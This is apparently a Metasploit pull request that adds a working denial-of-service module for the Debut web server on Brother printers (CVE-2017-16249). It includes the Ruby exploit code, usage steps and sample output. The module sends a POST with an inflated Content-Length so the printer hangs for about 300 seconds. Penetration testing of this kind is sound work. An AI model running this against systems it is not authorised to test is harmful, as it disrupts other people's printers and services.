### PR TITLE
Debut embedded httpd server (Brother printers) DoS

### DIFF
--- a/documentation/modules/auxiliary/dos/http/brother_debut_dos.md
+++ b/documentation/modules/auxiliary/dos/http/brother_debut_dos.md
@@ -1,0 +1,30 @@
+## Vulnerable Application
+
+  Version <= 1.20 of the Debut embedded httpd web server are vulnerable, which are found on Brother printers.
+  This module was successfully tested against a Brother HL-L2380DW series.
+
+  An nmap version scan of the vulnerable service should look similar to:
+  `80/tcp open  http    Debut embedded httpd 1.20 (Brother/HP printer http admin)`.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use auxiliary/dos/http/brother_debut_dos```
+  3. Do: ```set rhost [ip]```
+  4. Do: ```run```
+  5. You should see Success, and manual attempts to browse the web interface don't load.
+
+## Scenarios
+
+### Brother HL-L2380DW with Debut embedded 1.20
+
+```
+[*] Processing brother.rb for ERB directives.
+resource (brother.rb)> use auxiliary/dos/http/brother_debut_dos
+resource (brother.rb)> set rhost 192.168.2.126
+rhost => 192.168.2.126
+resource (brother.rb)> exploit
+[*] Sending malformed POST request at 2017-12-29 13:46:34.  Server will recover about 2017-12-29 13:51:34
+[+] 192.168.2.126:80 - Connection Refused: Success!
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/dos/http/brother_debut_dos.md
+++ b/documentation/modules/auxiliary/dos/http/brother_debut_dos.md
@@ -1,6 +1,11 @@
 ## Vulnerable Application
 
-  Version <= 1.20 of the Debut embedded httpd web server are vulnerable, which are found on Brother printers.
+  Versions <= 1.20 of the Debut embedded httpd web server in use by Brother printers are vulnerable to denial of service 
+  via a crafted HTTP request. This module will render the printer unresponsive from requests for ~300 seconds.
+  This is thought to be caused by a single threaded web server which
+  has a ~300 second timeout value.  By sending a request with a content-length larger than the actual data, the server waits
+  to receive the rest of the data, which doesn't happen until the timeout occurs.  This DoS is for all services, not just http.
+
   This module was successfully tested against a Brother HL-L2380DW series.
 
   An nmap version scan of the vulnerable service should look similar to:
@@ -19,12 +24,11 @@
 ### Brother HL-L2380DW with Debut embedded 1.20
 
 ```
-[*] Processing brother.rb for ERB directives.
-resource (brother.rb)> use auxiliary/dos/http/brother_debut_dos
-resource (brother.rb)> set rhost 192.168.2.126
-rhost => 192.168.2.126
-resource (brother.rb)> exploit
-[*] Sending malformed POST request at 2017-12-29 13:46:34.  Server will recover about 2017-12-29 13:51:34
-[+] 192.168.2.126:80 - Connection Refused: Success!
+resource (brother.rc)> use auxiliary/dos/http/brother_debut_dos
+resource (brother.rc)> set rhost 1.1.1.1
+rhost => 1.1.1.1
+resource (brother.rc)> exploit
+[*] Sending malformed POST request at 2018-01-24 20:45:52.
+[+] 1.1.1.1:80 - Connection Refused: Success! Server will recover about 2018-01-24 20:50:52
 [*] Auxiliary module execution completed
 ```

--- a/modules/auxiliary/dos/http/brother_debut_dos.rb
+++ b/modules/auxiliary/dos/http/brother_debut_dos.rb
@@ -31,26 +31,23 @@ class MetasploitModule < Msf::Auxiliary
 
   def is_alive?
     res = send_request_raw({
-      'method'	=>	'GET',
-      'uri'	=>	'/',
+      'method'	=> 'GET',
+      'uri'	=> '/',
     },10)
 
     return !res.nil?
   end
 
-  def run
-
+  def dos
+    # The web server is single threaded, and when the content length is longer than the data, it will continue to wait
+    # for the rest of the data, which never comes, and times out after ~300 seconds.
     begin
-      time = Time.new
-      print_status("Sending malformed POST request at #{time.strftime("%Y-%m-%d %H:%M:%S")}.  Server will recover about #{(time + 300).strftime("%Y-%m-%d %H:%M:%S")}")
-      # The web server is single threaded, and when the content length is longer than the data, it will continue to wait
-      # for the rest of the data, which never comes, and times out after ~300 seconds.
       data = Rex::Text.rand_text_alphanumeric(40)
       send_request_cgi({
-        'method'	=>	'POST',
-        'uri'		=>	'/',
-        'data'		=>	data, #'asdasdasdasdasdasdasd',
-        'headers'       => {
+        'method' => 'POST',
+        'uri'    => '/',
+        'data'   => data, #'asdasdasdasdasdasdasd',
+        'headers' => {
           # These are kept here since they were in the original exploit, however they are not required
           #'Host' => 'asdasdasd',
           #'User-Agent' => 'asdasdasd',
@@ -61,19 +58,23 @@ class MetasploitModule < Msf::Auxiliary
           #'Upgrade-Insecure-Requests' => 1,
           #'Content-Type' => 'application/x-www-form-urlencoded',
           'Content-Length' => data.length + rand(10) + 10 #42
-        }
-      })
-
-      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
-        print_error("Couldn't connect to #{peer}")
-      return
+          }
+        })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
+      print_error("Couldn't connect to #{peer}")
     end
+  end
+
+  def run
+    time = Time.new
+    print_status("Sending malformed POST request at #{time.strftime("%Y-%m-%d %H:%M:%S")}.")
+    dos
 
     # Check to see if it worked or not
     if is_alive?
-      print_error("#{peer} - Server is still alive")
+      print_error("#{peer} - Server is still alive.")
     else
-      print_good("#{peer} - Connection Refused: Success!")
+      print_good("#{peer} - Connection Refused: Success! Server will recover about #{(time + 300).strftime("%Y-%m-%d %H:%M:%S")}")
     end
 
   end

--- a/modules/auxiliary/dos/http/brother_debut_dos.rb
+++ b/modules/auxiliary/dos/http/brother_debut_dos.rb
@@ -41,28 +41,26 @@ class MetasploitModule < Msf::Auxiliary
   def dos
     # The web server is single threaded, and when the content length is longer than the data, it will continue to wait
     # for the rest of the data, which never comes, and times out after ~300 seconds.
-    begin
-      data = Rex::Text.rand_text_alphanumeric(40)
-      send_request_cgi({
-        'method' => 'POST',
-        'uri'    => '/',
-        'data'   => data, #'asdasdasdasdasdasdasd',
-        'headers' => {
-          # These are kept here since they were in the original exploit, however they are not required
-          #'Host' => 'asdasdasd',
-          #'User-Agent' => 'asdasdasd',
-          #'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
-          #'Accept-Language' => 'en-US,en;q=0.5',
-          #'Referer' => 'asdasdasdasd',
-          #'Connection' => 'close',
-          #'Upgrade-Insecure-Requests' => 1,
-          #'Content-Type' => 'application/x-www-form-urlencoded',
-          'Content-Length' => data.length + rand(10) + 10 #42
-          }
-        })
+    data = Rex::Text.rand_text_alphanumeric(40)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri'    => '/',
+      'data'   => data, #'asdasdasdasdasdasdasd',
+      'headers' => {
+        # These are kept here since they were in the original exploit, however they are not required
+        #'Host' => 'asdasdasd',
+        #'User-Agent' => 'asdasdasd',
+        #'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+        #'Accept-Language' => 'en-US,en;q=0.5',
+        #'Referer' => 'asdasdasdasd',
+        #'Connection' => 'close',
+         #'Upgrade-Insecure-Requests' => 1,
+        #'Content-Type' => 'application/x-www-form-urlencoded',
+        'Content-Length' => data.length + rand(10) + 10 #42
+        }
+      })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
       print_error("Couldn't connect to #{peer}")
-    end
   end
 
   def run

--- a/modules/auxiliary/dos/http/brother_debut_dos.rb
+++ b/modules/auxiliary/dos/http/brother_debut_dos.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary
       'License'        => MSF_LICENSE,
       'Author'         =>
       [
-        'z00n', # vulnerability disclosure
+        'z00n <0xz00n@gmail.com>', # vulnerability disclosure
         'h00die' # metasploit module
       ],
       'References'     => [
@@ -43,11 +43,13 @@ class MetasploitModule < Msf::Auxiliary
     begin
       time = Time.new
       print_status("Sending malformed POST request at #{time.strftime("%Y-%m-%d %H:%M:%S")}.  Server will recover about #{(time + 300).strftime("%Y-%m-%d %H:%M:%S")}")
-      # This request will set DoS the server for ~300 seconds
+      # The web server is single threaded, and when the content length is longer than the data, it will continue to wait
+      # for the rest of the data, which never comes, and times out after ~300 seconds.
+      data = Rex::Text.rand_text_alphanumeric(40)
       send_request_cgi({
         'method'	=>	'POST',
         'uri'		=>	'/',
-        'data'		=>	'asdasdasdasdasdasdasd',
+        'data'		=>	data, #'asdasdasdasdasdasdasd',
         'headers'       => {
           # These are kept here since they were in the original exploit, however they are not required
           #'Host' => 'asdasdasd',
@@ -58,7 +60,7 @@ class MetasploitModule < Msf::Auxiliary
           #'Connection' => 'close',
           #'Upgrade-Insecure-Requests' => 1,
           #'Content-Type' => 'application/x-www-form-urlencoded',
-          'Content-Length' => 42
+          'Content-Length' => data.length + rand(10) + 10 #42
         }
       })
 
@@ -69,9 +71,9 @@ class MetasploitModule < Msf::Auxiliary
 
     # Check to see if it worked or not
     if is_alive?
-      print_error("#{rhost}:#{rport} - Server is still alive")
+      print_error("#{peer} - Server is still alive")
     else
-      print_good("#{rhost}:#{rport} - Connection Refused: Success!")
+      print_good("#{peer} - Connection Refused: Success!")
     end
 
   end

--- a/modules/auxiliary/dos/http/brother_debut_dos.rb
+++ b/modules/auxiliary/dos/http/brother_debut_dos.rb
@@ -36,6 +36,8 @@ class MetasploitModule < Msf::Auxiliary
     },10)
 
     return !res.nil?
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
+    print_error("Couldn't connect to #{peer}")
   end
 
   def dos
@@ -59,8 +61,8 @@ class MetasploitModule < Msf::Auxiliary
         'Content-Length' => data.length + rand(10) + 10 #42
         }
       })
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
-      print_error("Couldn't connect to #{peer}")
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
+    print_error("Couldn't connect to #{peer}")
   end
 
   def run

--- a/modules/auxiliary/dos/http/brother_debut_dos.rb
+++ b/modules/auxiliary/dos/http/brother_debut_dos.rb
@@ -76,6 +76,5 @@ class MetasploitModule < Msf::Auxiliary
     else
       print_good("#{peer} - Connection Refused: Success! Server will recover about #{(time + 300).strftime("%Y-%m-%d %H:%M:%S")}")
     end
-
   end
 end

--- a/modules/auxiliary/dos/http/brother_debut_dos.rb
+++ b/modules/auxiliary/dos/http/brother_debut_dos.rb
@@ -1,0 +1,78 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Brother Debut http Denial Of Service',
+      'Description'    => %q{
+        The Debut embedded HTTP server <= 1.20 on Brother printers allows for a Denial
+        of Service (DoS) condition via a crafted HTTP request.  The printer will be
+        unresponsive from HTTP and printing requests for ~300 seconds.  After which, the
+        printer will start responding again.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'z00n', # vulnerability disclosure
+        'h00die' # metasploit module
+      ],
+      'References'     => [
+        [ 'CVE', '2017-16249' ],
+        [ 'URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-017/?fid=10211']
+      ],
+      'DisclosureDate' => 'Nov 02 2017'))
+  end
+
+  def is_alive?
+    res = send_request_raw({
+      'method'	=>	'GET',
+      'uri'	=>	'/',
+    },10)
+
+    return !res.nil?
+  end
+
+  def run
+
+    begin
+      time = Time.new
+      print_status("Sending malformed POST request at #{time.strftime("%Y-%m-%d %H:%M:%S")}.  Server will recover about #{(time + 300).strftime("%Y-%m-%d %H:%M:%S")}")
+      # This request will set DoS the server for ~300 seconds
+      send_request_cgi({
+        'method'	=>	'POST',
+        'uri'		=>	'/',
+        'data'		=>	'asdasdasdasdasdasdasd',
+        'headers'       => {
+          # These are kept here since they were in the original exploit, however they are not required
+          #'Host' => 'asdasdasd',
+          #'User-Agent' => 'asdasdasd',
+          #'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+          #'Accept-Language' => 'en-US,en;q=0.5',
+          #'Referer' => 'asdasdasdasd',
+          #'Connection' => 'close',
+          #'Upgrade-Insecure-Requests' => 1,
+          #'Content-Type' => 'application/x-www-form-urlencoded',
+          'Content-Length' => 42
+        }
+      })
+
+      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
+        print_error("Couldn't connect to #{peer}")
+      return
+    end
+
+    # Check to see if it worked or not
+    if is_alive?
+      print_error("#{rhost}:#{rport} - Server is still alive")
+    else
+      print_good("#{rhost}:#{rport} - Connection Refused: Success!")
+    end
+
+  end
+end


### PR DESCRIPTION
The Debut embedded HTTP server <= 1.20 on Brother printers allows for a Denial of Service (DoS) condition via a crafted HTTP request.  The printer will be unresponsive from HTTP and printing requests for ~300 seconds.  After which, the printer will start responding again.

I tested this on my Brother HL-L2380DW and it worked fine.

@0xz00n did you have an email you wanted me to put in on this?

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] ```use auxiliary/dos/http/brother_debut_dos```
- [x] ```set rhost [ip]```
- [x] ```run```
- [x] **Verify** printer website doesn't respond for ~300 seconds
- [x] **Document** looks good

